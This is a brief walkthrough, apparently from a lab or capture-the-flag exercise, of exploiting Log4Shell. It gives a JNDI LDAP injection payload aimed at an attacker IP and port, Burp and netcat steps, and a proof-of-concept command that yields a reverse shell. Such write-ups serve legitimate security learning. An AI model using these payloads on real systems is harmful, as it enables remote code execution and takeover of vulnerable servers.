🦪Log4Shell

Check this article for more info To check for Log4Shell exploit :

${jndi:ldap://10.8.0.178:4444/a}

Then url encode it and send through burp after intercepting:

Listening on nc:

We get some weird characters back.

Then we can use a log4j-shell Download java and execute

python3 poc.py --userip 10.8.1.208 --webport 8000 --lport 9001

Then send the payload:

Sending the url encoded payload in burpsuite.

Now we get a shell back: